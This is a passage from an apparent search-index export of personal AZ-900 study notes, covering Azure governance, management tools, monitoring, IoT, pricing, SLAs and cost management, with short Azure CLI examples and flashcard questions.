        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#governance-and-compliance-features-and-tools","title":"Governance and compliance: features and tools","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-purview","title":"Microsoft Purview","text":"

        Microsoft Purview is a family of data governance, risk, and compliance solutions that helps you get a single, unified view into your data. Microsoft Purview brings insights about your on-premises, multicloud, and software-as-a-service data together. It provides:

        • Automated data discovery
        • Sensitive data classification
        • End-to-end data lineage

        Microsoft Purview risk and compliance solutions: Microsoft 365 features as a core component of the Microsoft Purview risk and compliance solutions. Microsoft Teams, OneDrive, and Exchange are just some of the Microsoft 365 services that Microsoft Purview uses to help manage and monitor your data.

        Unified data governance: Microsoft Purview has robust, unified data governance solutions that help manage your on-premises, multicloud, and software as a service data. Microsoft Purview\u2019s robust data governance capabilities enable you to manage your data stored in Azure, SQL and Hive databases, locally, and even in other clouds like Amazon S3.

        Microsoft Purview\u2019s unified data governance helps your organization:

        • Create an up-to-date map of your entire data estate that includes data classification and end-to-end lineage.
        • Identify where sensitive data is stored in your estate.
        • Create a secure environment for data consumers to find valuable data.
        • Generate insights about how your data is stored and used.
        • Manage access to the data in your estate securely and at scale.

        Which feature in the Microsoft Purview governance portal should you use to manage access to data sources and datasets?

        • Incorrect: Data Catalog \u2013\u2013 This enables data discovery.
        • Incorrect: Data Sharing \u2013\u2013 This shares data within and between organizations.
        • Incorrect: Data Estate Insights \u2013\u2013 This assesses data estate health.
        • Correct: Data Policy \u2013\u2013 This governs access to data.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-policy","title":"Azure Policy","text":"

        Azure Policy is a service in Azure that enables you to create, assign, and manage policies that control or audit your resources.

        Azure Policy enables you to define both individual policies and groups of related policies, known as initiatives. Azure Policy evaluates your resources and highlights resources that aren't compliant with the policies you've created. Azure Policy can also prevent noncompliant resources from being created.

        Azure Policies can be set at each level, enabling you to set policies on a specific resource, resource group, subscription, and so on. Additionally, Azure Policies are inherited, so if you set a policy at a high level, it will automatically be applied to all of the groupings that fall within the parent.

        Azure Policy comes with built-in policy and initiative definitions for Storage, Networking, Compute, Security Center, and Monitoring. In some cases, Azure Policy can automatically remediate noncompliant resources and configurations to ensure the integrity of the state of the resources. This applies, for example, in the tagging of resources. If you have a specific resource that you don\u2019t want Azure Policy to automatically fix, you can flag that resource as an exception.
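
        A rough Azure CLI sketch of assigning a built-in policy at resource-group scope (the assignment name, resource group, and allowed location below are illustrative, not from the source):

        # Look up the built-in "Allowed locations" policy definition by its display name\ndefinition=$(az policy definition list --query "[?displayName=='Allowed locations'].name" -o tsv)\n\n# Assign it to a resource group so new resources can only be created in the listed region\naz policy assignment create --name limit-regions --policy "$definition" --resource-group my-rg --params '{"listOfAllowedLocations":{"value":["westeurope"]}}'\n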

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-initiative-policies","title":"Azure initiative policies","text":"

        An Azure Policy initiative is a way of grouping related policies together. The initiative definition contains all of the policy definitions to help track your compliance state for a larger goal. For instance, the Enable Monitoring in Azure Security Center initiative contains over 100 separate policy definitions. Its goal is to monitor all available security recommendations for all Azure resource types in Azure Security Center.

        Under this initiative, the following policy definitions are included:

        • Monitor unencrypted SQL Database in Security Center: This policy monitors for unencrypted SQL databases and servers.
        • Monitor OS vulnerabilities in Security Center: This policy monitors servers that don't satisfy the configured OS vulnerability baseline.
        • Monitor missing Endpoint Protection in Security Center: This policy monitors for servers that don't have an installed endpoint protection agent.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#resource-locks","title":"Resource locks","text":"

        Resource locks prevent resources from being deleted or updated, depending on the type of lock. Resource locks can be applied to individual resources, resource groups, or even an entire subscription. Resource locks are inherited, meaning that if you place a resource lock on a resource group, all of the resources within the resource group will also have the resource lock applied.

        There are two types of resource locks: one that prevents users from deleting a resource, and one that prevents users from changing or deleting it.

        • Delete means authorized users can still read and modify a resource, but they can't delete the resource.
        • ReadOnly means authorized users can read a resource, but they can't delete or update the resource. Applying this lock is similar to restricting all authorized users to the permissions granted by the Reader role.

        You can manage resource locks from the Azure portal, PowerShell, the Azure CLI, or from an Azure Resource Manager template. To view, add, or delete locks in the Azure portal, go to the Settings section of any resource's Settings pane in the Azure portal. To modify a locked resource, you must first remove the lock. After you remove the lock, you can apply any action you have permissions to perform. Resource locks apply regardless of RBAC permissions. Even if you're an owner of the resource, you must still remove the lock before you can perform the blocked activity.
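
        As a minimal sketch, creating and removing a delete lock with the Azure CLI (lock and resource group names are illustrative):

        # Prevent deletion of everything in the resource group (locks are inherited by its resources)\naz lock create --name no-delete --lock-type CanNotDelete --resource-group my-rg\n\n# List locks, then remove the lock before performing the previously blocked action\naz lock list --resource-group my-rg -o table\naz lock delete --name no-delete --resource-group my-rg\n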

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-trust-portal","title":"Service Trust portal","text":"

        The Microsoft Service Trust Portal provides access to content, tools, and other resources about Microsoft security, privacy, and compliance practices.

        You can access the Service Trust Portal at https://servicetrust.microsoft.com/.

        The Service Trust Portal features and content are accessible from the main menu. The categories on the main menu are:

        • Service Trust Portal provides a quick-access hyperlink to return to the Service Trust Portal home page.
        • My Library lets you save (or pin) documents to quickly access them on your My Library page. You can also set up notifications for when documents in your My Library are updated.
        • All Documents is a single landing place for documents on the Service Trust Portal. From All Documents, you can pin documents to have them show up in your My Library.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#key-azure-management-tools","title":"Key Azure Management Tools","text":"

        There are several tools at your disposal to manage Azure resources and environments. They include the Azure Portal, Azure PowerShell, Azure CLI, the Azure Mobile App, and ARM templates.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-portal","title":"Azure Portal","text":"

        The Azure portal is a web-based user interface that you can use to access almost every feature of Azure. It can be used to visually understand and manage your Azure environment, while Azure PowerShell allows you to quickly perform one-off tasks and to script tasks as needed. Azure PowerShell is available for Windows, Linux, and Mac, and you can access it in a web browser via Azure Cloud Shell.

        Azure Portal does not offer a way to automate repetitive tasks.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cloud-shell","title":"Azure Cloud Shell","text":"

        Browser-based scripting environment that is accessible from Azure Portal. It requires a storage account. It allows you to choose the shell experience that suits you best.

        During AZ-900 preparation on the Microsoft Learn platform, an Azure Cloud Shell is provided.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cli","title":"Azure CLI","text":"

        Azure CLI is a command-line program to connect to Azure and execute administrative commands on Azure resources. It runs on Linux, macOS, and Windows, and allows administrators and developers to execute their commands through a terminal, command-line prompt, or script instead of a web browser.

        It\u2019s an executable program that you can use to execute commands in Bash. You can use the Azure CLI to perform every possible management task in Azure. Launch the Azure CLI in interactive mode:

        # Launch Azure CLI interactive mode from Azure Cloud Shell\naz interactive\n\nversion\nupgrade\nexit\n
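
        And a minimal non-interactive sketch of a one-off task (resource group name and location are illustrative):

        # Sign in, create a resource group, and list the groups in the subscription\naz login\naz group create --name my-rg --location westeurope\naz group list -o table\n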

        See cheat sheet for Azure CLI.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-powershell","title":"Azure PowerShell","text":"

        Azure PowerShell is a shell with which developers, DevOps, and IT professionals can run commands called cmdlets. These commands call the Azure REST API to perform management tasks in Azure.

        In addition to being available via Azure Cloud Shell, you can install and configure Azure PowerShell on Windows, Linux, and Mac platforms.

        See cheat sheet for Azure PowerShell.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resource-manager-arm-and-azure-arm-templates","title":"Azure Resource Manager (ARM) and Azure ARM templates","text":"

        Azure Resource Manager (ARM) is the service used to provision resources in Azure (via the portal, Azure CLI, Terraform, etc.). A resource can be anything you provision inside an Azure subscription. Resources always belong to a Resource Group. Each type of resource (VM, Web App) is provisioned and managed by a Resource Provider (RP). There are close to two hundred RPs within the Azure platform today (and growing with the release of each new service).

        Azure Arc takes the notion of the Resource Provider and extends it to resources outside of Azure. Azure Arc introduces a new Resource Provider (RP) called \u201cHybrid Compute\u201d. The HybridCompute RP is responsible for managing the resources outside of Azure, which it does by connecting to the Azure Arc agent deployed to the external VM. Once we deploy the Azure Arc agent to a VM running, for instance, in Google Cloud, it shows up in the Azure portal within the resource group \u201caz_arc_rg\u201d. Since the Google Cloud-hosted VM (gcp-vm-001) is an ARM resource, it is an object inside Azure AD. Furthermore, there can be a managed identity associated with the Google VM.

        With Azure Resource Manager, you can:

        • Manage your infrastructure through declarative templates rather than scripts. A Resource Manager template is a JSON file that defines what you want to deploy to Azure.
        • Deploy, manage, and monitor all the resources for your solution as a group, rather than handling these resources individually.
        • Re-deploy your solution throughout the development life-cycle and have confidence your resources are deployed in a consistent state.
        • Define the dependencies between resources, so they're deployed in the correct order.
        • Apply access control to all services because RBAC is natively integrated into the management platform.
        • Apply tags to resources to logically organize all the resources in your subscription.
        • Clarify your organization's billing by viewing costs for a group of resources that share the same tag.

        Infrastructure as code: ARM templates and Bicep are two examples of using infrastructure as code with the Azure Resource Manager to maintain your environment.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#arm-templates_1","title":"ARM templates","text":"

        By using ARM templates, you can describe the resources you want to use in a declarative JSON format. With an ARM template, the deployment code is verified before any code is run. This ensures that the resources will be created and connected correctly. The template then orchestrates the creation of those resources in parallel. Templates can even execute PowerShell and Bash scripts before or after the resource has been set up.
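
        As an illustrative sketch, validating and deploying a template at resource-group scope with the Azure CLI (the resource group, file name, and parameter are assumptions):

        # Validate the ARM template first, then deploy it declaratively\naz deployment group validate --resource-group my-rg --template-file azuredeploy.json\naz deployment group create --resource-group my-rg --template-file azuredeploy.json --parameters environment=dev\n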

        Benefits of using ARM templates:

        • Declarative syntax: ARM templates allow you to create and deploy an entire Azure infrastructure declaratively.
        • Repeatable results: Repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner.
        • Orchestration: You don't have to worry about the complexities of ordering operations and interdependencies.
        • Modular files: You can break your templates into smaller, reusable components and link them together at deployment time.
        • Extensibility: With deployment scripts, you can add PowerShell or Bash scripts to your templates.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#biceps","title":"Biceps","text":"

        Bicep is a language that uses declarative syntax to deploy Azure resources. A Bicep file defines the infrastructure and configuration. Then, ARM deploys that environment based on your Bicep file. While similar to an ARM template, which is written in JSON, Bicep files tend to use a simpler, more concise style.

        Benefits of using Bicep files:

        • Support for all resource types and API versions: Bicep immediately supports all preview and GA versions for Azure services.
        • Simple syntax: When compared to the equivalent JSON template, Bicep files are more concise and easier to read. Bicep requires no previous knowledge of programming languages.
        • Repeatable results: Repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner.
        • Orchestration: You don't have to worry about the complexities of ordering operations.
        • Modularity: You can break your Bicep code into manageable parts by using modules.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-arc","title":"Azure Arc","text":"

        Azure Arc is a bridge that extends the Azure platform to help you build applications and services with the flexibility to run across datacenters, at the edge, and in multicloud environments. Develop cloud-native applications with a consistent development, operations, and security model. Azure Arc runs on both new and existing hardware, virtualization and Kubernetes platforms, IoT devices, and integrated systems.

        Azure Arc is not just a \u201csingle-pane\u201d of control for cloud and on-premises. Azure Arc takes Azure\u2019s all-important control plane \u2013 namely, the Azure Resource Manager (ARM) \u2013 and extends it outside of Azure. In order to understand the implication of the last statement, it will help to go over a few ARM terms.

        In utilizing Azure Resource Manager (ARM), Arc lets you extend your Azure compliance and monitoring to your hybrid and multi-cloud configurations. Azure Arc simplifies governance and management by delivering a consistent multi-cloud and on-premises management platform.

        Azure Arc provides a centralized, unified way to:

        • Manage your entire environment together by projecting your existing non-Azure resources into ARM.
        • Manage multi-cloud and hybrid virtual machines, Kubernetes clusters, and databases as if they are running in Azure.
        • Use familiar Azure services and management capabilities, regardless of where they live.
        • Continue using traditional ITOps while introducing DevOps practices to support new cloud and native patterns in your environment.
        • Configure custom locations as an abstraction layer on top of Azure Arc-enabled Kubernetes clusters and cluster extensions.

        Currently, Azure Arc allows you to manage the following resource types hosted outside of Azure:

        • Servers
        • Kubernetes clusters
        • Azure data services
        • SQL Server
        • Virtual machines (preview)
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitoring-tools","title":"Azure Monitoring tools","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-advisor_1","title":"Azure Advisor","text":"

        Azure Advisor evaluates your Azure resources and makes recommendations to help improve reliability, security, and performance, achieve operational excellence, and reduce costs. Azure Advisor is designed to help you save time on cloud optimization. The recommendation service includes suggested actions you can take right away, postpone, or dismiss.

        The recommendations are divided into five categories:

        • Reliability is used to ensure and improve the continuity of your business-critical applications.
        • Security is used to detect threats and vulnerabilities that might lead to security breaches.
        • Performance is used to improve the speed of your applications.
        • Operational Excellence is used to help you achieve process and workflow efficiency, resource manageability, and deployment best practices.
        • Cost is used to optimize and reduce your overall Azure spending.

        Azure Monitor, Service Health, and Azure Advisor all use action groups to notify you when an alert has been triggered.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-service-health","title":"Azure Service Health","text":"

        Microsoft Azure provides a global cloud solution to help you manage your infrastructure needs, reach your customers, innovate, and adapt rapidly. Azure Service Health helps you keep track of Azure resources, both your specifically deployed resources and the overall status of Azure. Azure Service Health does this by combining three different Azure services:

        • Azure Status informs you of service outages in Azure on the Azure Status page. The page is a global view of the health of all Azure services across all Azure regions.
        • Service Health provides a narrower view of Azure services and regions. It focuses on the Azure services and regions you're using. This is the best place to look for service-impacting communications about outages, planned maintenance activities, and other health advisories, because the authenticated Service Health experience knows which services and resources you currently use. You can even set up Service Health alerts to notify you when service issues, planned maintenance, or other changes may affect the Azure services and regions you use.
        • Resource Health is a tailored view of your actual Azure resources. It provides information about the health of your individual cloud resources, such as a specific virtual machine instance, and helps to diagnose issues. You can obtain support when an Azure service issue affects your resources.

        By using Azure Status, Service Health, and Resource Health, Azure Service Health gives you a complete view of your Azure environment, all the way from the global status of Azure services and regions down to specific resources.

        Something you initially thought was a simple anomaly but that turned into a trend can readily be reviewed and investigated thanks to historical alerts.

        Azure Monitor, Service Health, and Azure Advisor all use action groups to notify you when an alert has been triggered.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitor","title":"Azure Monitor","text":"

        Azure Monitor is a platform for collecting data on your resources, analyzing that data, visualizing the information, and even acting on the results. Azure Monitor can monitor Azure resources, your on-premises resources, and even multi-cloud resources like virtual machines hosted with a different cloud provider.

        Azure Monitor, Service Health, and Azure Advisor all use action groups to notify you when an alert has been triggered.

        As soon as you create an Azure subscription and start deploying resources, Azure Monitor begins collecting data. Azure Monitor is a platform that collects metric and logging data, such as CPU percentages. The data can be used to trigger autoscaling.

        Which Azure service can generate an alert if virtual machine utilization is over 80% for five minutes? Azure Monitor.
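
        A sketch of exactly that alert with the Azure CLI (resource group, VM resource ID variable, and action group name are illustrative):

        # Alert when the VM's average CPU exceeds 80% over a 5-minute window\naz monitor metrics alert create --name cpu-over-80 --resource-group my-rg --scopes $vm_id --condition "avg Percentage CPU > 80" --window-size 5m --evaluation-frequency 1m --action my-action-group\n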

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-log-analytics","title":"Azure Log Analytics","text":"

        Azure Log Analytics is the tool in the Azure portal where you\u2019ll write and run log queries on the data gathered by Azure Monitor. Log Analytics is a robust tool that supports both simple and complex queries, as well as data analysis. You can write a simple query that returns a set of records and then use features of Log Analytics to sort, filter, and analyze the records. You can write an advanced query to perform statistical analysis and visualize the results in a chart to identify a particular trend.

        Activity Logs record when resources are created or modified.
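
        A minimal sketch of running a log query from the Azure CLI (the workspace ID variable is a placeholder; the query itself is written in KQL):

        # Return ten recent records from the Activity Log table of a Log Analytics workspace\naz monitor log-analytics query --workspace $workspace_id --analytics-query "AzureActivity | take 10" -o table\n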

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitor-alerts","title":"Azure Monitor Alerts","text":"

        Azure Monitor Alerts are an automated way to stay informed when Azure Monitor detects a threshold being crossed. You set the alert conditions and the notification actions, and then Azure Monitor Alerts notifies you when an alert is triggered. Depending on your configuration, Azure Monitor Alerts can also attempt corrective action.

        Alerts can be set up to monitor the logs and trigger on certain log events, or they can be set to monitor metrics and trigger when certain metrics are crossed. Azure Monitor Alerts use action groups to configure who to notify and what action to take. An action group is simply a collection of notification and action preferences that you associate with one or multiple alerts.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#application-insights","title":"Application Insights","text":"

        Application Insights, an Azure Monitor feature, monitors your web applications. Application Insights is capable of monitoring applications that are running in Azure, on-premises, or in a different cloud environment.

        There are two ways to configure Application Insights to help monitor your application. You can either install an SDK in your application, or you can use the Application Insights agent. The Application Insights agent is supported in C#.NET, VB.NET, Java, JavaScript, Node.js, and Python.

        Once Application Insights is up and running, you can use it to monitor a broad array of information, such as:

        • Request rates, response times, and failure rates
        • Dependency rates, response times, and failure rates, to show whether external services are slowing down performance
        • Page views and load performance reported by users' browsers
        • AJAX calls from web pages, including rates, response times, and failure rates
        • User and session counts
        • Performance counters from Windows or Linux server machines, such as CPU, memory, and network usage
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot","title":"Azure IoT","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot-hub","title":"Azure IoT Hub","text":"

        Azure IoT Hub is an Azure-hosted service that functions as a message hub for bidirectional communications between your deployed IoT devices and Azure services. You can connect millions of devices and their backend solutions reliably and securely. Almost any device can be connected to an IoT hub.

        Several messaging patterns are supported, including device-to-cloud telemetry, uploading files from devices, and request-reply methods to control your devices from the cloud. IoT Hub also supports monitoring to help you track device creation, device connections, and device failures.

        IoT Hub can further route messages to Azure Data Lake Storage.
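
        As a rough sketch, creating a hub and registering a device identity with the Azure CLI (names are illustrative; the device-identity command may require the azure-iot extension):

        # Create an IoT hub, then register a device identity on it\naz iot hub create --name my-iot-hub --resource-group my-rg --sku S1\naz iot hub device-identity create --hub-name my-iot-hub --device-id my-device\n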

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot-central","title":"Azure IoT Central","text":"

        Built on the functions provided by IoT Hub, it provides visualization, control, and management features for IoT devices. You can connect devices, view telemetry, view overall device performance, create and manage alerts, or even push updates to devices.

        IoT Central has device templates to facilitate management.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sphere","title":"Azure Sphere","text":"

        Azure Sphere is an integrated IoT solution that consists of three key parts:

        • Azure Sphere micro-controller units (MCUs): hardware component built into the IoT devices that processes the OS and signals from attached sensors.
        • Management software: a custom Linux operating system that manages communication with the security service and runs the vendor's device software.
        • Azure Sphere Security Service (AS3): handles certificate-based device authentication to Azure, ensures that the device has not been compromised, and pushes OS and other software updates to the device as needed.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-artificial-intelligence","title":"Azure Artificial Intelligence","text":"

        AI falls into two broad categories: deep learning and machine learning.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-machine-learning","title":"Azure Machine Learning","text":"

        Collection of Azure services and tools that enable you to use data to train and validate models. It provides multiple services and features, such as Azure Machine Learning Studio, a web portal through which developers can create no-code and code-first solutions.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cognitive-services","title":"Azure Cognitive Services","text":"

        Azure Cognitive Services provides machine learning models to interact with humans and execute cognitive functions that humans would normally perform: language, speech, vision, and decision-making.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-bot-service","title":"Azure Bot Service","text":"

        Azure Bot Service enables you to create and use virtual agents to interact with users.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devops","title":"Azure DevOps","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devops-services","title":"Azure DevOps Services","text":"

        This is not a single service but rather a group of services:

        • Azure Artifacts
        • Azure Boards
        • Azure Pipelines
        • Azure Repos
        • Azure Test Plans
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#github-and-github-actions","title":"GitHub and GitHub Actions","text":"

        GitHub and GitHub Actions offer many of the same functions as Azure DevOps Services. Generally speaking, GitHub is the appropriate choice for collaborating on open-source projects, and Azure DevOps is the appropriate choice for enterprise/internal projects.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devtest-labs","title":"Azure DevTest Labs","text":"

        Azure DevTest Labs automates the deployment, configuration, and decommissioning of VMs and other Azure resources.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-for-defense","title":"Azure for defense","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-firewall","title":"Azure Firewall","text":"

        Azure Firewall allows you to centrally create, enforce, and log application and network connectivity policies across subscriptions and virtual networks.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ddos-protection","title":"Azure DDoS Protection","text":"

        Azure DDoS Protection Standard can provide full layer 3 to layer 7 mitigation capability.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sentinel","title":"Azure Sentinel","text":"

        SIEM + SOAR: Azure Sentinel combines security information and event management (SIEM) with security orchestration, automation, and response (SOAR).

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-pricing-service-level-agreements-and-lifecycle","title":"Azure Pricing, Service Level Agreements, and Lifecycle","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#pricing","title":"Pricing","text":"

        There are free and paid subscriptions:

        • Free trial: 12 months of select free services. Credit of $200 (September 2023) to use any Azure service for 30 days. Services are disabled when time or credit expire. Convertible to paid subscriptions.
        • Pay-as-you-go: typical consumption cloud model.
        • Member offers: Some products or services provide credits toward Azure Services.

        Subscriptions alone don't give you access to Azure services per se. For that, you need to purchase services through:

        • Enterprise agreement.
        • Web Direct.
        • Cloud Solution Provider (or CSP).

        If you want to raise the limit or quota above the default limit, \"open an online customer support request at no charge\". (Correct)

        Billing zone: Geographical grouping of Azure regions for billing Azure resources.

        Tools: Azure Advisor

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-level-agreements","title":"Service Level Agreements","text":"

        A Service Level Agreement (SLA) is an agreement between a service provider and a consumer that generally guarantees that the SLA-backed service will be available for a specific period during the month. Maximum monthly downtime by SLA level:

        • 99% SLA -> 7.20 hours
        • 99.90% SLA -> 43.20 minutes
        • 99.95% SLA -> 21.60 minutes
        • 99.99% SLA -> 4.32 minutes
        • 99.999% SLA -> 25.9 seconds

        A key point: If an Azure service is available but with degraded performance, it still meets the SLA. The service must be completely unavailable to fail the SLA and qualify for a service credit.

        In addition to having different SLAs, each Azure service also has its own service credits. Generally, the higher the SLA, the lower the service credit will be.

        SIE is the acronym for Service Impacting Event.

        Composite SLA is the SLA that results from combining services with potentially different SLAs. To determine the composite SLA, you simply multiply the SLA values for each resource.

        Tip for the exam: Deploying instances of a VM across two or more availability zones raises the SLA for the VM from 99.9% to 99.99%. For a composite SLA, multiply the individual values: for example, two dependent services at 99.95% and 99.99% give 0.9995 x 0.9999, roughly 99.94%.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-lifecycle-in-azure","title":"Service Lifecycle in Azure","text":"

        Previews allow you to test pre-release versions of Azure services. Previews have their own terms and conditions; some don't include customer support at all. Even though a service is available in preview, that doesn't mean it's ready for a production environment.

        • Private Preview: Azure feature available to certain Azure customers for evaluation purposes.
        • Public Preview: Azure feature available to all Azure customers for evaluation purposes. Accessible from the Azure Portal.

        Preview features of the Azure portal itself can be tried at the Azure portal preview (https://preview.portal.azure.com/).

        General availability means that the service, application, or feature is available for all Azure customers.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cost-management","title":"Cost Management","text":"

        Cloud pricing models and related cost-saving options:

        • Pay-as-you-go: suitable for development, testing, short-term projects, and businesses that prefer OpEx over CapEx.
        • Reserved instances: commit to a specific VM type and size for a fixed term (1 or 3 years) in exchange for discounted pricing. Suitable for long-term projects with predictable resource requirements and businesses looking to optimize costs. By prepaying, cost savings can be significant, up to 70% or more. Reservations do not automatically renew, however, and pricing reverts to pay-as-you-go when the reservation term expires.
        • Spot pricing: take advantage of unused Azure capacity at a significant discount. Azure can terminate spot instances at any time. Cost-effective, but with no guarantees. Suitable for batch processing, data analysis, and non-critical dev and testing: cost-sensitive but interruptible tasks.
        • Azure Hybrid Benefit: for those who have perpetual licenses of a service and want to move their services to Azure, Azure Hybrid Benefit enables them to repurpose these licenses and gain a corresponding cost savings. BUT it's specific to Windows Server and SQL Server, not to all Microsoft licenses that your organization owns.

        The OpEx cost can be impacted by many factors:

        • Resource type: When you provision an Azure resource, Azure automatically creates metered instances for that resource. The meters track the resource's usage and generate a usage record that is used to calculate your bill. Usage captured by each meter results in a certain number of billable units, and those billable units are converted to charges based on the resource type. One billable unit for a particular service will differ in value from a billable unit for another service.
        • Uptime.
        • Consumption: Pay-as-you-go payment model where you pay for the resources that you use during a billing cycle. Azure also offers the ability to commit to using a set amount of cloud resources. When you reserve capacity, you\u2019re committing to using and paying for a certain amount of Azure resources during a given period (typically one or three years).
        • Geography or resource allocation: The cost of power, labor, taxes, and fees vary depending on the location. Due to these variations, Azure resources can differ in costs to deploy depending on the region.
        • Network Traffic: Bandwidth refers to data moving in and out of Azure datacenters. Some inbound data transfers (data going into Azure datacenters) are free. For outbound data transfers (data leaving Azure datacenters), data transfer pricing is based on zones.
        • Subscription type: Some Azure subscription types also include usage allowances, which affect costs.
        • Azure Marketplace: Azure Marketplace lets you purchase Azure-based solutions and services from third-party vendors. Watch out for recurring costs associated with third-party offerings in Azure Marketplace.

        Additionally, it's necessary to pay attention to small details: for example, every time you provision a VM, additional resources such as storage and networking are also provisioned. If you deprovision the VM, those additional resources may not be deprovisioned at the same time, whether intentionally or unintentionally. Ongoing maintenance is needed to keep costs adjusted.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#pricing-calculator","title":"Pricing calculator","text":"

        This service helps you choose the best Azure resources for your needs given a budget. With the pricing calculator, you can estimate the cost of any provisioned resources, including compute, storage, and associated network costs. You can even account for different storage options like storage type, access tier, and redundancy.

        https://azure.microsoft.com/en-us/pricing/calculator/

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#tco-calculator","title":"TCO calculator","text":"

        Total Cost of Ownership Calculator (TCO calculator) helps you compare the costs for running an on-premises infrastructure compared to an Azure Cloud infrastructure. With the TCO calculator, you enter your current infrastructure configuration, including servers, databases, storage, and outbound network traffic. The TCO calculator then compares the anticipated costs for your current environment with an Azure environment supporting the same infrastructure requirements.

        https://azure.microsoft.com/en-us/pricing/tco/calculator/

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-cost-management-tool-or-azure-cost-management-billing","title":"Microsoft Cost Management tool - or Azure Cost Management + Billing","text":"

        If you accidentally provision new resources, you may not be aware of them until it\u2019s time for your invoice. Cost Management is a service that helps avoid those situations. Cost Management provides the ability to quickly check Azure resource costs, create alerts based on resource spend, and create budgets that can be used to automate management of resources.

        Two key words so far: alerts and budgets.

        Cost analysis is a subset of Cost Management that provides a quick visual for your Azure costs. Using cost analysis, you can quickly view the total cost in a variety of different ways, including by billing cycle, region, resource, and so on. A budget is where you set a spending limit for Azure.

        Budgets: You can set budgets based on a subscription, resource group, service type, or other criteria. When you set a budget, you will also set a budget alert.

        Cost alerts provide a single location to quickly check on all of the different alert types that may show up in the Cost Management service. The three types of alerts that may show up are:

        • Budget alerts: Budget alerts support both cost-based and usage-based budgets (Budgets are defined by cost or by consumption usage when using the Azure Consumption API).
        • Credit alerts: Credit alerts are generated automatically at 90% and at 100% of your Azure credit balance. Whenever an alert is generated, it's reflected in cost alerts, and in the email sent to the account owners.
        • Department spending quota alerts: Department spending quota alerts notify you when department spending reaches a fixed threshold of the quota.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#flashcard-questions","title":"Flashcard questions","text":"

        What is Cloud computing?

        The delivery of computing services, such as servers, storage, databases, and networking, over the Internet to provide faster innovation, flexible resources, and economies of scale.

        How does cloud computing lower operating costs?

        By only paying for the cloud services used, rather than the capital expense of buying hardware and setting up on-site datacenters.

        Why do organizations move to the cloud?

        For cost savings, improved speed and scalability, increased productivity, better performance, reliability, and improved security.

        What is the advantage of cloud computing's self-service and on-demand nature?

